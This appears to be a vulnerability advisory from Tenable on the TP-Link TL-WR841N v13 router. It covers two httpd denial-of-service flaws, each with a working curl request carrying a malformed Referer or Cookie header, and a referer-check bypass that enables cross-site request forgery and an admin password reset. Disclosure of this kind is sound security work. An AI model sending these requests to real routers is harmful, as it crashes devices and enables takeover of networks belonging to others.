[R1] TP-Link TL-WRN841N Multiple Vulnerabilities

Tenable was recently investigating TP-Link's TL-WR841N v13 using firmware 0.9.1 4.16 v0348.0 (listed as TL-WR841N(US)_V13_180119 on the download page). As a result, Tenable found multiple vulnerabilities.

CVE-2018-15700: httpd Denial of Service via Referer Header

A locally connected user sending an HTTP request with a missing protocol string in the "Referer" field will result in the httpd service terminating. We believe this is a NULL pointer dereference error in the http_parser_main function. The problem starts with a memcmp looking for "http://" in the first seven bytes of the "Referer" field. Only if this succeeds will a "Referer" string variable be initialized. When the memcmp fails the program flow still continues and attempts string operations on the uninitialized NULL string. The resulting crash requires a router reboot to revive httpd web interface.

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: DOS' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' --compressed

CVE-2018-15701: httpd Denial of Service via Cookie Header

Crafting an HTTP request with an HTTP "Cookie" field of "Authorization;" will result in the httpd service terminating. Again, a router reboot is required to revive the web interface. We believe this is another parsing error in "http_parser_main".

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://tplinkwifi.net/' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' -H 'Cookie: Authorization;' --compressed

CVE-2018-15702: XSRF due to Incomplete Referer Check

In the http_parser_main function, referer whitelisting is accomplished using strncmp with a length field derived from "tplinklogin.net", "tplinkwifi.net", or router IP strings. Since strncmp is only comparing the first few characters of the referer domain string, an attacker can pass this check by crafting a domain or subdomain of "tplinklogin.net**", "tplinkwifi.net*", or "<router's IP>*".

This issue is magnified in severity due to a previously disclosed but unpatched authentication bypass vulnerability (CVE-2018-11714). This allows a remote attacker to perform XSRF to various sensitive cgi scripts. A remote attacker is able enable remote management and reset the router admin password.